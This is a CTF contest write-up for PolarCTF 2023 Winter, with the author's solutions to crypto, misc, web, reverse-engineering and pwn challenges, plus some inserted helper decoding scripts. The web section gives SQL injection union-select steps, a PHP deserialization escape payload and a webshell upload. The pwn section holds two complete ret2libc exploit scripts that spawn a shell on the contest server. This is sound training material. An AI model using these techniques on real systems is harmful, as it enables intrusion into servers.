PolarCTF 2023 Winter Individual Challenge WP

Published: 2023-12-10 00:52:03 Author: 清纯少女小琪

Crypto

Counting Stars (数星星)

Challenge

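Xiao Ming had had a secret crush on Xiao Hong for a long time, and one dark and windy night he finally decided to ask her out to count the stars. As he counted, he came up with a string of numbers, 3, 6, 10, 12, 15. He felt this was the key to love and pondered it the whole night; Xiao Hong got angry and slapped him. Xiao Ming believes this string of numbers is what cost him his love. What are you waiting for? Come and count along!
Hash the result with MD5 (32 characters, lowercase)!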

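My solution:

Idea: count how often each word occurs and sort by frequency, then map the star-counting numbers 3, 6, 10, 12, 15 onto that order. The words found at those positions, joined together, are the answer. Steps:

The text is one long run of concatenated English words, so do a word-frequency analysis to get the number of occurrences of each word.

This can be done by hand in a text editor. I used the editor's replace function and replaced each word I found with ".", which makes it hard to miss any; by the end it is easy to see which words have not been found yet.

Once the words are found, write the script: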

# -*- coding:utf-8 -*-
# Author: 小琪呀!

# 1.txt holds the text from the attachment
with open("1.txt", 'r') as f:
    data = f.read()

statistics = {}   # occurrence count -> word
frequency = []    # every occurrence count
num = [3, 6, 10, 12, 15]

def zipin(words):
    for w in words:
        statistics.setdefault(data.count(w), str(w))
        frequency.append(data.count(w))
    frequency.sort()
    # print the words ranked 3rd, 6th, 10th, 12th and 15th by ascending count
    for i in num:
        print(''.join(statistics.get(frequency[i-1])), end='')
    print('\n')
    return statistics

# letters below holds every word that occurs in the attachment.
if __name__ == '__main__':
    letters = ["tonight","success","favorite","example","should","crypto","is","learn","found","morning","we","system","sublim","your","which","word"]
    print(zipin(letters))

# The ciphertext is nothing but repeated words, which suggests a word-frequency count:
# first get how often each word occurs, then sort the counts,
# and finally join the words at positions 3, 6, 10, 12 and 15.

#whichisyourfavoriteword
#{117: 'tonight', 138: 'success', 136: 'favorite', 139: 'example', 131: 'should', 141: 'crypto', 129: 'is', 134: 'learn', 125: 'found', 113: 'morning', 124: 'we', 130: 'system', 132: 'sublim', 133: 'your', 120: 'which', 140: 'word'}

Finally, remember to MD5 it.
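An added example, not the author's script: it scripts the manual find-and-replace step by tokenising the text against the word list with a longest-first match, so a short word is never counted inside a longer one, and it refuses to rank when two counts tie. The sample text, the word list and all function names are constructed for illustration.

```python
import hashlib
import re
from collections import Counter

# Constructed sample, not the challenge attachment: "this" x1, "fun" x2,
# "is" x3, "really" x4, concatenated without separators.
SAMPLE_VOCAB = ["is", "this", "fun", "really"]
SAMPLE_TEXT = "thisisfunreallyisreally\nfunreallyisreally"


def tokenize(text, vocabulary):
    """Split concatenated text into vocabulary words, longest match first."""
    text = "".join(text.split())  # the text may be wrapped across lines
    pattern = re.compile("|".join(
        re.escape(w) for w in sorted(vocabulary, key=len, reverse=True)))
    tokens, pos = [], 0
    while pos < len(text):
        match = pattern.match(text, pos)
        if match is None:
            # Scripted form of "replace every found word with '.' and see
            # what is left": leftover text means a word is missing.
            raise ValueError(f"no known word at offset {pos}: {text[pos:pos + 12]!r}")
        tokens.append(match.group())
        pos = match.end()
    return tokens


def words_at_ranks(text, vocabulary, ranks):
    """Join the words found at the given 1-based ranks, rarest word first."""
    counts = Counter(tokenize(text, vocabulary))
    ordered = sorted(counts.items(), key=lambda item: item[1])
    frequencies = [count for _, count in ordered]
    if len(set(frequencies)) != len(frequencies):
        raise ValueError("two words share a count, so the ranking is ambiguous")
    return "".join(ordered[rank - 1][0] for rank in ranks)


def md5_lower(text):
    """32-character lowercase MD5 hex digest, the format the challenge asks for."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    # Substring counting sees "is" inside "this" and reports 4 instead of 3.
    print(SAMPLE_TEXT.count("is"), tokenize(SAMPLE_TEXT, SAMPLE_VOCAB).count("is"))
    picked = words_at_ranks(SAMPLE_TEXT, SAMPLE_VOCAB, [1, 3])
    print(picked, md5_lower(picked))
```

For the challenge itself, pass the contents of 1.txt, the 16-word list and the ranks 3, 6, 10, 12, 15.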

Mysterious Organization M (神秘组织M)

Challenge

This organization was founded by 5 people!!!

{bc1bg572ec066}a0d2fb137l951b5451f06b7

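My solution:

This one was fun, and it was the challenge I spent the most time on...

Idea: the number 5 suggests Caesar or rail fence? Steps:

First, decoding with Caesar or rail fence directly does not produce the flag. So the question is what has to be done as a first step.

Try rot13.

Then Caesar or rail fence again? Rail fence now gives a result in flag format (the offset here is 5, in groups of 4; the 4 was found by trial and error!):

Then apply rot13 once more (if you do not see why, you can solve it directly with 随波逐流; that tool is how I found out it was rot13!)

A Different Four-Square (不一样的四四方方) (had an idea but got no result)

I Love 456 (我爱456) (no idea)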

AFF

Challenge

Uppercase the result before submitting the flag

flag = "WMPTPTRGGPED"
 
flaglist = []
 
for i in flag:
    flaglist.append(ord(i)-97)
 
flags = ""
for i in flaglist:
    for j in range(0,26):
        c = (3 * j - 17) % 26
        if(c == i):
            flags += chr(j+97)


print(a,b,flag)

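My solution:

Idea: the challenge name says it is an affine cipher; the main task is finding a and b in the corresponding equation.

From the code, a and b are 3 and 17.

Then uppercase the result.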
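An added example, not part of the challenge or the author's notes: affine decryption with a = 3 and b = 17, assuming the standard form E(x) = (a*x + b) mod 26 over A-Z, plus a search of all 312 valid keys for when a and b are not known. The function names and the crib "AFFINE" used in the search are assumptions made for the example.

```python
from math import gcd

M = 26  # alphabet size


def _shift(ch):
    """Return the code point of 'A' or 'a' for a letter, None otherwise."""
    if "A" <= ch <= "Z":
        return ord("A")
    if "a" <= ch <= "z":
        return ord("a")
    return None


def affine_encrypt(plaintext, a, b):
    """E(x) = (a*x + b) mod 26; non-letters pass through unchanged."""
    return "".join(
        ch if _shift(ch) is None
        else chr((a * (ord(ch) - _shift(ch)) + b) % M + _shift(ch))
        for ch in plaintext)


def affine_decrypt(ciphertext, a, b):
    """D(y) = a^-1 * (y - b) mod 26; requires gcd(a, 26) == 1."""
    if gcd(a, M) != 1:
        raise ValueError(f"a={a} has no inverse mod {M}, so it is not a valid key")
    a_inv = pow(a, -1, M)  # modular inverse (Python 3.8+); for a=3 this is 9
    return "".join(
        ch if _shift(ch) is None
        else chr(a_inv * (ord(ch) - _shift(ch) - b) % M + _shift(ch))
        for ch in ciphertext)


def search_keys(ciphertext, crib):
    """Try all 12 * 26 = 312 keys; keep those whose plaintext contains crib."""
    hits = []
    for a in range(1, M):
        if gcd(a, M) != 1:
            continue
        for b in range(M):
            plain = affine_decrypt(ciphertext, a, b)
            if crib in plain:
                hits.append((a, b, plain))
    return hits


if __name__ == "__main__":
    # Ciphertext from the challenge, keys from the solution above.
    print(affine_decrypt("WMPTPTRGGPED", 3, 17))
    print(search_keys("WMPTPTRGGPED", "AFFINE"))
```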

base

Challenge

j2rXjx8wSZjD
GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789=+/

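My solution:

A typical Base64 with a swapped alphabet. No characters are missing from the table here, so CyberChef solves it directly. Sigh, 500 points is wasted on this challenge! It should not be worth that much.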
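An added example, not the author's method (the write-up uses CyberChef): the same decoding done by mapping each character of the custom table to the character at the same index in the second table and then decoding as ordinary Base64. Both tables and the ciphertext are copied from the challenge; the function name is hypothetical.

```python
import base64

# Values copied from the challenge text above.
CIPHERTEXT = "j2rXjx8wSZjD"
CUSTOM_TABLE = "GHI3KLMNJOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5"
REFERENCE_TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789=+/"


def decode_custom_base64(data, custom, reference):
    """Translate data from the custom table to the reference table, then decode.

    The check on the tables is the scripted form of "no characters are
    missing": both must have the same length and no repeated character,
    otherwise the mapping is not one-to-one and the result is unreliable.
    """
    if len(custom) != len(reference):
        raise ValueError("tables differ in length")
    if len(set(custom)) != len(custom) or len(set(reference)) != len(reference):
        raise ValueError("a table contains a repeated character")
    unknown = sorted(set(data) - set(custom))
    if unknown:
        raise ValueError(f"characters not in the custom table: {unknown}")

    translated = data.translate(str.maketrans(custom, reference))
    # Restore padding if the input length is not a multiple of 4.
    translated += "=" * (-len(translated) % 4)
    # validate=True rejects anything outside the standard Base64 alphabet
    # instead of silently skipping it.
    return base64.b64decode(translated, validate=True)


if __name__ == "__main__":
    print(decode_custom_base64(CIPHERTEXT, CUSTOM_TABLE, REFERENCE_TABLE))
```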

Misc

Sign-in Meow (签到喵)

Challenge

Xiao Ming has an adorable cat that he named Xiaomei. One day Xiaomei suddenly stood up and spoke the following in cat language:
~呜喵喵喵喵呜啊喵啊~呜喵呜呜~呜啊~啊喵啊呜喵呜~~~喵~呜呜呜~~喵喵喵呜呜呜~呜呜喵呜呜啊喵呜啊啊喵啊呜~喵啊啊~喵~呜呜呜呜啊喵喵喵呜啊喵啊喵呜喵呜呜~喵喵喵啊喵啊呜喵呜喵~~喵~呜呜喵啊喵喵喵喵呜啊喵喵呜呜喵呜呜啊喵呜呜啊喵啊呜喵呜~喵~喵~呜呜呜喵喵喵喵喵呜呜喵喵呜呜喵呜呜~喵啊啊啊喵啊呜喵喵啊啊~喵~呜呜喵~喵喵喵喵呜呜喵喵啊呜喵呜呜~呜啊呜啊喵啊呜~喵啊啊~喵~呜呜喵啊~喵喵喵呜呜啊呜啊呜喵呜呜啊呜啊啊啊喵啊呜~啊呜喵~喵~呜喵呜~~喵喵喵呜呜啊~啊呜喵呜呜~呜啊呜啊喵啊呜~啊喵喵~喵~呜喵啊喵喵喵喵喵呜呜~喵~呜喵呜呜~喵啊~啊喵啊呜~喵啊喵~喵~呜呜呜喵呜喵喵喵呜啊喵啊喵呜喵呜呜啊呜~呜啊喵啊呜喵呜呜呜~喵~呜喵呜啊喵喵喵喵呜呜呜呜啊呜喵呜呜~喵喵喵啊喵啊呜~啊喵啊啊
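Xiao Ming was astonished. He thinks Xiaomei is passing him some hidden message. Help Xiao Ming translate what Xiaomei said, and get the answer from the generated file.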
import qrcode
import base64

message = '6K+35Y+R6YCB4oCc5a6d5a6d5oOz6KaBZmxhZ+KAnQ=='
print(base64.b64decode(message).decode())

qr = qrcode.QRCode(
    version=1,
    error_correction=qrcode.constants.ERROR_CORRECT_H,
    box_size=10,
    border=4,
)
qr.add_data('')  # put what Xiaomei said here
qr.make(fit=True)

img = qr.make_image(fill='black',back_color='white')
img.save('qrcode.png')

My solution:

The challenge code is too obvious: "put what Xiaomei said here" generates a QR code, so just run it

import qrcode
import base64

message = '6K+35Y+R6YCB4oCc5a6d5a6d5oOz6KaBZmxhZ+KAnQ=='
print(base64.b64decode(message).decode())

qr = qrcode.QRCode(
    version=1,
    error_correction=qrcode.constants.ERROR_CORRECT_H,
    box_size=10,
    border=4,
)
qr.add_data('~呜喵喵喵喵呜啊喵啊~呜喵呜呜~呜啊~啊喵啊呜喵呜~~~喵~呜呜呜~~喵喵喵呜呜呜~呜呜喵呜呜啊喵呜啊啊喵啊呜~喵啊啊~喵~呜呜呜呜啊喵喵喵呜啊喵啊喵呜喵呜呜~喵喵喵啊喵啊呜喵呜喵~~喵~呜呜喵啊喵喵喵喵呜啊喵喵呜呜喵呜呜啊喵呜呜啊喵啊呜喵呜~喵~喵~呜呜呜喵喵喵喵喵呜呜喵喵呜呜喵呜呜~喵啊啊啊喵啊呜喵喵啊啊~喵~呜呜喵~喵喵喵喵呜呜喵喵啊呜喵呜呜~呜啊呜啊喵啊呜~喵啊啊~喵~呜呜喵啊~喵喵喵呜呜啊呜啊呜喵呜呜啊呜啊啊啊喵啊呜~啊呜喵~喵~呜喵呜~~喵喵喵呜呜啊~啊呜喵呜呜~呜啊呜啊喵啊呜~啊喵喵~喵~呜喵啊喵喵喵喵喵呜呜~喵~呜喵呜呜~喵啊~啊喵啊呜~喵啊喵~喵~呜呜呜喵呜喵喵喵呜啊喵啊喵呜喵呜呜啊呜~呜啊喵啊呜喵呜呜呜~喵~呜喵呜啊喵喵喵喵呜呜呜呜啊呜喵呜呜~喵喵喵啊喵啊呜~啊喵啊啊')  # put what Xiaomei said here
qr.make(fit=True)

img = qr.make_image(fill='black',back_color='white')
img.save('qrcode.png')

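This produces a QR code

Ah, no, wait, sorry. Damn, this is the encoding script; I misread it. Scanning this code just gives back the original meow text...

But running the script did give us one more piece of information: 请发送“宝宝想要flag” (please send "宝宝想要flag")

Follow the official account and send that phrase to get the flag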

宝宝请拿flag:flag{www.PolarCTF.com}

A 宽宽 S 00 E (unsolved)

Challenge

(1) Determine whether injection exists: and 1=1, and 1=2, and so on
(2) Determine the number of columns: order by 2
(3) Find the displayed position: union select 1,2
(4) Determine the database name: and 1=2 union select 1,database()
(5) Determine the table name: and 1=2 union select 1,table_name from information_schema.tables where table_schema =’maoshe’
(6) Determine the column name: and 1=2 union select 1,column_name from information_schema.columns where table_name =’admin’ limit 2,1
(7) Find the actual data: and 1=2 union select 1,password from admin

What is this? No idea, bye... next challenge.

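Classified (机密)

Challenge

My solution:

The challenge provides a packet capture; analyse it

Following the TCP stream shows

There is an archive in it; extract it on Kali and brute-force it with a digits-only charset to get the password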

flag{d72e5a671aa50fa5f400e5d10eedeaa5}

Is It UU? (是uu吗)

Challenge

密码.txt

&,3(S-#4V

There is also a wav file.

My solution:

Going by the challenge name, UU, decoding with UUencode gives the wav password.

Then extract with steghide

steghide extract -sf noon-close-to-you.wav

This gives

>9FQA9WLV-S$S-S@Y-#8P,C,V-#@W-S@S,C0V.#E]

UU-decode again

flag{671378946023648778324689}
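An added example, not the author's tooling: a decoder for a single uuencoded data line, showing the format both strings above use, where the first character carries the decoded byte count and every following group of 4 characters carries 3 bytes of 6 bits each. The two input lines are copied from this write-up; the function name is hypothetical.

```python
# Lines copied from the write-up: the content of 密码.txt and the steghide output.
PASSWORD_LINE = "&,3(S-#4V"
STEGO_LINE = ">9FQA9WLV-S$S-S@Y-#8P,C,V-#@W-S@S,C0V.#E]"


def uu_decode_line(line):
    """Decode one uuencoded data line (no begin/end wrapper)."""
    line = line.rstrip("\r\n")
    if not line:
        raise ValueError("empty line")
    if any(not 32 <= ord(c) <= 96 for c in line):
        raise ValueError("character outside the uuencode range 0x20-0x60")

    def six_bits(c):
        # Both space (0x20) and backtick (0x60) stand for the value 0.
        return (ord(c) - 32) & 0x3F

    declared = six_bits(line[0])  # number of decoded bytes on this line
    body = line[1:]
    if len(body) % 4 != 0:
        raise ValueError("body must be a whole number of 4-character groups")

    out = bytearray()
    for i in range(0, len(body), 4):
        v0, v1, v2, v3 = (six_bits(c) for c in body[i:i + 4])
        # Repack four 6-bit values into three 8-bit bytes.
        out.append((v0 << 2 | v1 >> 4) & 0xFF)
        out.append((v1 << 4 | v2 >> 2) & 0xFF)
        out.append((v2 << 6 | v3) & 0xFF)
    if declared > len(out):
        raise ValueError("length character claims more bytes than the line holds")
    return bytes(out[:declared])  # drop padding bytes from the last group


if __name__ == "__main__":
    print(uu_decode_line(PASSWORD_LINE))  # the steghide passphrase
    print(uu_decode_line(STEGO_LINE))     # the flag
```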

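Socialism Is Great (社会主义大法好)

Challenge

A jpg and an encrypted archive

My solution:

Rename the jpg and open it

Inside are the key numbers 1945 and 2014

Trying them shows that 1945 is the archive password; extracting gives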

平等平等和谐文明自由公正法治和谐公正自由自由法治平等公正公正诚信民主平等爱国和谐民主和谐爱国公正爱国平等爱国平等自由自由平等公正自由公正诚信和谐公正民主自由爱国公正友善公正自由诚信民主和谐敬业平等法治公正民主和谐富强自由诚信富强法治平等自由诚信富强法治平等和谐自由平等平等自由民主法治富强公正友善平等自由诚信和谐法治诚信富强自由诚信和谐公正平等和谐公正和谐敬业法治爱国平等爱国公正法治和谐爱国法治敬业自由文明自由友善平等和谐富强自由公正法治法治和谐平等法治民主和谐自由自由爱国法治自由平等民主和谐平等文明友善平等法治民主自由诚信民主和谐公正自由文明自由和谐自由文明富强友善自由文明友善平等平等法治公正诚信民主自由爱国平等民主自由自由公正敬业自由敬业法治爱国公正友善平等法治和谐和谐友善法治

Core-socialist-values decoding (社会主义解码)

U2FsdGVkX18hXTEdmaHlK9Wa0JuJu4UApkMzMe69xXg8yBK0Fw5q4HtQ5+qK6BCB
+WkHQDiIxks=

Rabbit stream cipher decryption, the password is 2014

flag{Hold_high_the_banner_of_socialism}

EZ Sign-in (EZ签到) (unsolved)

WEB

Cookie Spoofing (cookie欺骗)

Challenge

My solution:

Intercept the request with Burp and change the cookie: user=admin

upload

Challenge

My solution:

Construct the payload

Then upload it

Connect with AntSword and find the flag

cool

Challenge

 <?php
if(isset($_GET['a'])){
    $a = $_GET['a'];
    if(is_numeric($a)){
        echo "no";
    }
    if(!preg_match("/flag|system|php/i", $a)){
        eval($a);
    }
}else{
    highlight_file(__FILE__);
}
?>

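My solution:

First, it checks whether $a is numeric. If it is, it prints "no". So we make sure it is not a number

Then bypass the match condition involving the listed strings. This finally gives the payload:

Random Value (随机值)

Challenge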

 <?php
include "flag.php";
class Index{
    private $Polar1;
    private $Polar2;
    protected $Night;
    protected $Light;

    function getflag($flag){
        $Polar2 = rand(0,100);
        if($this->Polar1 === $this->Polar2){
            $Light = rand(0,100);
            if($this->Night === $this->Light){
                echo $flag;
            }
        }
        else{
            echo "Your wrong!!!";
        }
    }
}
if(isset($_GET['sys'])){
    $a = unserialize($_GET['sys']);
    $a->getflag($flag);
}
else{
    highlight_file("index.php");
}
?> 

My solution:

A simple deserialization

exp:

phpurl

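Challenge

During a penetration test, the red team used a website directory scanner and found that the site's source code had leaked. The file name appears to be encoded: aW5kZXgucGhwcw.

My solution:

Decode the file name as the hint suggests

Visit that address to get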

 <?php
if("xxs"===$_GET[sys]) {
  echo("<p>Not a good idea!</p>");
  exit();
}

$_GET[sys] = urldecode($_GET[sys]);
if($_GET[sys] == "xxs")
{
  echo "<p>Welcome to polar LABS!</p>";
  echo "<p>Flag: XXXXXXX </p>";
}
?>

what can you find? 

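Pass a parameter named sys with the value xxs, but URL-encoded, and encoded twice because of the first if condition

You Can't Escape (你想逃也逃不掉)

Challenge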

 <?php
/*
    https://ytyyds.github.io/ (unrelated to this challenge)
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($string){
    return preg_replace( '/phtml|php3|php4|php5|aspx|gif/','', $string);
}
$user['username'] = $_POST['name'];
$user['passwd'] = $_GET['passwd'];
$user['sign'] = '123456';

$ans = filter(serialize($user));
if(unserialize($ans)[sign] == "ytyyds"){
    echo file_get_contents('flag.php');
} 

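My solution:

After serialization:

Target substring: ";s:6:"passwd";s:2:"sb";s:4:"sign";s:6:"ytyyds";}

We need to swallow ";s:6:"passwd";s:26:" which is 21 characters in total

That is, escape 21 characters

21 = 4*4 + 5

From the filter pattern above, pick four strings of length 4 and one of length 5, i.e.:

php4php4php4phtmlphp4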

RE

easyre1

My solution:

exp:

a = 'd^XSAozQPU^WOBU[VQOATZSE@AZZVOF'
flag = ''
b = '5055045045055045055045055045055'
# each flag character is (cipher character + 1) XOR the matching key character
for i in range(len(a)):
    flag += chr((ord(a[i]) + 1) ^ ord(b[i]))
print(flag)
#PolarDNbecomesbiggerandstronger

babyRE

My solution:

In other words, adding 2 gives the flag

exp:

a='asdfgcvbnmjgtlop'
flag = ''
for i in range(len(a)):
    flag+=chr(ord(a[i])+2)
print(flag)
#cufhiexdpolivnqr

PY_RE

Challenge

start.py

import Test
Dict = {}
key = 'A'
value = 26
for i in range(1,27):
    Dict.setdefault(key, value)
    key = chr(ord(key) + 1)
    value = value - 1
print("===================Py_Reverse====================")

def main():
    Input_Str = input("Please Input Str:\n")
    Input_Str = list(Input_Str)
    Test.EnData1(Input_Str,Dict)
    Test.Judge(Input_Str)
main()

Test.py

def EnData1(Input_Str,Dict):
    for i in range(int(len(Input_Str)/2),len(Input_Str)):
        for dict in Dict:
            if Input_Str[i] == str(dict):
                Input_Str[i] = Dict[dict]
                break
def Judge(Input_Str):
    FLAG = ['H', 'E', 'L', 'L', 'O', '_', '_', 11, 2, 7, 19, 12, 13]
    if str(Input_Str) == str(FLAG):
        print("YES!")
    else:
        print("NO!")
all_data = []
def EnData(Input_Str,Dict):
    for i in range(int(len(Input_Str)/2),len(Input_Str)):
        flag = 0
        for dict in Dict:
            if Input_Str[i] == dict:
                all_data.append(Dict[dict])
                flag = 1
        if  flag == 0:
            all_data.append(Input_Str[i])

My solution:

Print the dictionary

MD5-hash it

flag{ceee59bbd765a9cb20daa0c1d2b3b9d0}

PWN

look

My solution:

exp:

from pwn import *
p=remote('120.46.59.242','2095')
w_plt=0x80483E0
w_got=0x804A018
main=0x8048410
payload=b'a'*108+p32(0)+p32(w_plt)+p32(main)+p32(1)+p32(w_got)+p32(4)
p.sendline(payload)
write_addr=u32(p.recv(4))
print(hex(write_addr))

libc_add=write_addr-0x0d44d0
bin_sh=libc_add+0x15912b
system=libc_add+0x03a950
payload=b'a'*112+p32(system)+p32(main)+p32(bin_sh)
p.sendline(payload)
p.interactive()

05ret2libc_64

My solution:

64-bit ret2libc

First leak a libc address, then use the stack overflow to execute system("/bin/sh") and get a shell

exp:

from pwn import *
p=remote('120.46.59.242','2099')
puts_plt=0x4005A0
gets_got=0x601038
pop_rdi=0x400843
main=0x400610
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(gets_got)+p64(puts_plt)+p64(main)
p.recvuntil('question:\n')
p.sendline(payload)
p.recvuntil('Maybe the answer is 0\n')
gets_got=u64(p.recv(6).ljust(8,b'\x00'))
libc_base=gets_got-0x06ed90
bin_sh=libc_base+0x18ce57
system=libc_base+0x0453a0
payload=b'a'*256+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendline(payload)
p.interactive()